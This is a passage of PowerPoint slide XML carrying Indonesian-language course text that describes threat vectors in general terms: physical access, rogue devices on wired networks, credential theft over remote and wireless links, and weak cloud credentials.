              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stasiun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PC, laptop, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk drive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host lain. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluncurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyadapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, on-path, dan DoS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Jarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membobol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Atau, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memalsukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengambilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> detail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Akses Awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
